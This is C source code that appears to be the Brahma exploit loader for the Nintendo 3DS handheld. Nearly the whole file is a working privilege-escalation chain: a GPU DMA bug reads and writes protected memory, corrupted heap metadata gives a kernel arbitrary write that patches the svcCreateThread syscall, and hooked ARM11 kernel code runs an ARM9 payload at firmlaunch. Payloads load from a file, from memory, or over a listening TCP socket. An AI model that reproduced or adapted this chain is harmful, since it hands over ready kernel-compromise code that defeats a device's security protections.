#include <3ds.h> #include #include #include #include #include #include #include #include #include #include "brahma.h" #include "exploitdata.h" /* should be the very first call. allocates heap buffer for ARM9 payload */ u32 brahma_init (void) { g_ext_arm9_buf = memalign(0x1000, ARM9_PAYLOAD_MAX_SIZE); return (g_ext_arm9_buf != 0); } /* call upon exit */ u32 brahma_exit (void) { if (g_ext_arm9_buf) { free(g_ext_arm9_buf); } return 1; } /* overwrites two instructions (8 bytes in total) at src_addr with code that redirects execution to dst_addr */ void redirect_codeflow (u32 *dst_addr, u32 *src_addr) { *(src_addr + 1) = dst_addr; *src_addr = ARM_JUMPOUT; } /* exploits a bug that causes the GPU to copy memory that otherwise would be inaccessible to code from a non-privileged context */ void do_gshax_copy (void *dst, void *src, u32 len) { u32 check_mem = linearMemAlign(0x10000, 0x40); s32 i = 0; for (i = 0; i < 16; ++i) { GSPGPU_FlushDataCache (NULL, src, len); GX_SetTextureCopy(NULL, src, 0, dst, 0, len, 8); GSPGPU_FlushDataCache (NULL, check_mem, 16); GX_SetTextureCopy(NULL, src, 0, check_mem, 0, 0x40, 8); } HB_FlushInvalidateCache(); linearFree(check_mem); return; } /* fills exploit_data structure with information that is specific to 3DS model and firmware version returns: 0 on failure, 1 on success */ s32 get_exploit_data (struct exploit_data *data) { u32 fversion = 0; u8 isN3DS = 0; s32 i; s32 result = 0; u32 sysmodel = SYS_MODEL_NONE; if(!data) return result; fversion = osGetFirmVersion(); APT_CheckNew3DS(NULL, &isN3DS); sysmodel = isN3DS ? SYS_MODEL_NEW_3DS : SYS_MODEL_OLD_3DS; /* copy platform and firmware dependent data */ for(i=0; i < sizeof(supported_systems) / sizeof(supported_systems[0]); i++) { if (supported_systems[i].firm_version == fversion && supported_systems[i].sys_model & sysmodel) { memcpy(data, &supported_systems[i], sizeof(struct exploit_data)); result = 1; break; } } return result; } /* exploits a bug in order to cause the ARM11 kernel to write a certain 32 bit value to 'address' */ void priv_write_four (u32 address) { const u32 size_heap_cblk = 8 * sizeof(u32); u32 addr_lin, addr_lin_o; u32 dummy; u32 *saved_heap = linearMemAlign(size_heap_cblk, 0x10); u32 *cstm_heap = linearMemAlign(size_heap_cblk, 0x10); svcControlMemory(&addr_lin, 0, 0, 0x2000, MEMOP_ALLOC_LINEAR, 0x3); addr_lin_o = addr_lin + 0x1000; svcControlMemory(&dummy, addr_lin_o, 0, 0x1000, MEMOP_FREE, 0); // back up heap do_gshax_copy(saved_heap, addr_lin_o, size_heap_cblk); // set up a custom heap ctrl structure cstm_heap[0] = 1; cstm_heap[1] = address - 8; cstm_heap[2] = 0; cstm_heap[3] = 0; // corrupt heap ctrl structure by overwriting it with our custom struct do_gshax_copy(addr_lin_o, cstm_heap, 4 * sizeof(u32)); // Trigger write to 'address' svcControlMemory(&dummy, addr_lin, 0, 0x1000, MEMOP_FREE, 0); // restore heap do_gshax_copy(addr_lin, saved_heap, size_heap_cblk); linearFree(saved_heap); linearFree(cstm_heap); return; } // trick to clear icache void user_clear_icache (void) { s32 i, result = 0; s32 (*nop_func)(void); const u32 size_nopslide = 0x1000; u32 *nop_slide = memalign(0x1000, size_nopslide); if (nop_slide) { HB_ReprotectMemory(nop_slide, 4, 7, &result); for (i = 0; i < size_nopslide / sizeof(u32); i++) { nop_slide[i] = ARM_NOP; } nop_slide[i-1] = ARM_RET; nop_func = nop_slide; HB_FlushInvalidateCache(); nop_func(); free(nop_slide); } return; } /* get system dependent data and set up ARM11 structures */ s32 setup_exploit_data (void) { s32 result = 0; if (get_exploit_data(&g_expdata)) { /* copy data required by code running in ARM11 svc mode */ g_arm11shared.va_hook1_ret = g_expdata.va_hook1_ret; g_arm11shared.va_pdn_regs = g_expdata.va_pdn_regs; g_arm11shared.va_pxi_regs = g_expdata.va_pxi_regs; result = 1; } return result; } /* Corrupts ARM11 kernel code (CreateThread()) in order to open a door for code execution with ARM11 SVC privileges. */ s32 corrupt_svcCreateThread (void) { s32 result = 0; priv_write_four(g_expdata.va_patch_createthread); user_clear_icache(); result = 1; return result; } /* TODO: network code might be moved somewhere else */ s32 recv_arm9_payload (void) { s32 sockfd; struct sockaddr_in sa; s32 ret; u32 kDown, old_kDown; s32 clientfd; struct sockaddr_in client_addr; s32 addrlen = sizeof(client_addr); s32 sflags = 0; if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[!] Error: socket()\n"); return 0; } bzero(&sa, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_port = htons(BRAHMA_NETWORK_PORT); sa.sin_addr.s_addr = gethostid(); if (bind(sockfd, (struct sockaddr*)&sa, sizeof(sa)) != 0) { printf("[!] Error: bind()\n"); close(sockfd); return 0; } if (listen(sockfd, 1) != 0) { printf("[!] Error: listen()\n"); close(sockfd); return 0; } printf("[x] IP %s:%d\n", inet_ntoa(sa.sin_addr), BRAHMA_NETWORK_PORT); g_ext_arm9_size = 0; g_ext_arm9_loaded = 0; sflags = fcntl(sockfd, F_GETFL); if (sflags == -1) { printf("[!] Error: fcntl() (1)\n"); close(sockfd); } fcntl(sockfd, F_SETFL, sflags | O_NONBLOCK); hidScanInput(); old_kDown = hidKeysDown(); while (1) { hidScanInput(); kDown = hidKeysDown(); if (kDown != old_kDown) { printf("[!] Aborted\n"); close(sockfd); return 0; } clientfd = accept(sockfd, (struct sockaddr*)&client_addr, &addrlen); svcSleepThread(100000000); if (clientfd > 0) break; } printf("[x] Connection from %s:%d\n\n", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port)); s32 recvd; u32 total = 0; s32 overflow = 0; while ((recvd = recv(clientfd, g_ext_arm9_buf + total, ARM9_PAYLOAD_MAX_SIZE - total, 0)) != 0) { if (recvd != -1) { total += recvd; printf("."); } if (total >= ARM9_PAYLOAD_MAX_SIZE) { overflow = 1; printf("[!] Error: invalid payload size\n"); break; } } fcntl(sockfd, F_SETFL, sflags & ~O_NONBLOCK); printf("\n\n[x] Received %d bytes in total\n", total); g_ext_arm9_size = overflow ? 0 : total; g_ext_arm9_loaded = (g_ext_arm9_size != 0); close(clientfd); close(sockfd); return g_ext_arm9_loaded; } /* reads ARM9 payload from a given path. filename: full path of payload returns: 0 on failure, 1 on success */ s32 load_arm9_payload (char *filename) { s32 result = 0; u32 fsize = 0; if (!filename) return result; FILE *f = fopen(filename, "rb"); if (f) { fseek(f , 0, SEEK_END); fsize = ftell(f); g_ext_arm9_size = fsize; rewind(f); if (fsize >= 8 && (fsize <= ARM9_PAYLOAD_MAX_SIZE)) { u32 bytes_read = fread(g_ext_arm9_buf, 1, fsize, f); result = (g_ext_arm9_loaded = (bytes_read == fsize)); } fclose(f); } return result; } /* reads ARM9 payload from memory. data: array of u8 containing the payload dsize: size of the data array returns: 0 on failure, 1 on success */ s32 load_arm9_payload_from_mem (u8* data, u32 dsize) { s32 result = 0; if ((data != NULL) && (dsize >= 8) && (dsize <= ARM9_PAYLOAD_MAX_SIZE)) { g_ext_arm9_size = dsize; memcpy(g_ext_arm9_buf, data, dsize); result = g_ext_arm9_loaded = 1; } return result; } /* copies ARM9 payload to FCRAM - before overwriting it in memory, Brahma creates a backup copy of the mapped firm binary's ARM9 entry point. The copy will be stored into offset 4 of the ARM9 payload during run-time. This allows the ARM9 payload to resume booting the Nintendo firmware code. Thus, the format of ARM9 payload written for Brahma is the following: - a branch instruction at offset 0 and - a placeholder (u32) at offset 4 (=ARM9 entrypoint) */ s32 map_arm9_payload (void) { void *src; volatile void *dst; u32 size = 0; s32 result = 0; dst = (void *)(g_expdata.va_fcram_base + OFFS_FCRAM_ARM9_PAYLOAD); if (!g_ext_arm9_loaded) { // defaul ARM9 payload src = &arm9_start; size = (u8 *)&arm9_end - (u8 *)&arm9_start; } else { // external ARM9 payload src = g_ext_arm9_buf; size = g_ext_arm9_size; } if (size >= 0 && size <= ARM9_PAYLOAD_MAX_SIZE) { memcpy(dst, src, size); result = 1; } return result; } s32 map_arm11_payload (void) { void *src; volatile void *dst; u32 size = 0; u32 offs; s32 result_a = 0; s32 result_b = 0; src = &arm11_start; dst = (void *)(g_expdata.va_exc_handler_base_W + OFFS_EXC_HANDLER_UNUSED); size = (u8 *)&arm11_end - (u8 *)&arm11_start; // TODO: sanitize 'size' if (size) { memcpy(dst, src, size); result_a = 1; } offs = size; src = &g_arm11shared; size = sizeof(g_arm11shared); dst = (u8 *)(g_expdata.va_exc_handler_base_W + OFFS_EXC_HANDLER_UNUSED + offs); // TODO sanitize 'size' if (result_a && size) { memcpy(dst, src, size); result_b = 1; } return result_a && result_b; } void exploit_arm9_race_condition (void) { s32 (* const _KernelSetState)(u32, u32, u32, u32) = (void *)g_expdata.va_kernelsetstate; asm volatile ("clrex"); /* copy ARM11 payload and console specific data */ if (map_arm11_payload() && /* copy ARM9 payload to FCRAM */ map_arm9_payload()) { /* patch ARM11 kernel to force it to execute our code (hook1 and hook2) as soon as a "firmlaunch" is triggered */ redirect_codeflow(g_expdata.va_exc_handler_base_X + OFFS_EXC_HANDLER_UNUSED, g_expdata.va_patch_hook1); redirect_codeflow(PA_EXC_HANDLER_BASE + OFFS_EXC_HANDLER_UNUSED + 4, g_expdata.va_patch_hook2); CleanEntireDataCache(); InvalidateEntireInstructionCache(); // trigger ARM9 code execution through "firmlaunch" _KernelSetState(0, 0, 2, 0); // prev call shouldn't ever return } return; } /* - restores corrupted code of CreateThread() syscall */ void repair_svcCreateThread (void) { asm volatile ("clrex"); CleanEntireDataCache(); InvalidateEntireInstructionCache(); // repair CreateThread() *(u32 *)(g_expdata.va_patch_createthread) = 0x8DD00CE5; CleanEntireDataCache(); InvalidateEntireInstructionCache(); return; } /* restore svcCreateThread code (not really required, but just to be on the safe side) */ s32 __attribute__((naked)) priv_firm_reboot (void) { asm volatile ("add sp, sp, #8\t\n"); repair_svcCreateThread(); exploit_arm9_race_condition(); asm volatile ("movs r0, #0\t\n" "ldr pc, [sp], #4\t\n"); } /* perform firmlaunch. load ARM9 payload before calling this function. otherwise, calling this function simply reboots the handheld */ s32 firm_reboot (void) { s32 fail_stage = 0; fail_stage++; /* platform or firmware not supported, ARM11 exploit failure */ if (setup_exploit_data()) { fail_stage++; /* failure while trying to corrupt svcCreateThread() */ if (corrupt_svcCreateThread()) { fail_stage++; /* Firmlaunch failure, ARM9 exploit failure*/ svcCorruptedCreateThread(priv_firm_reboot); } } /* we do not intend to return ... */ return fail_stage; }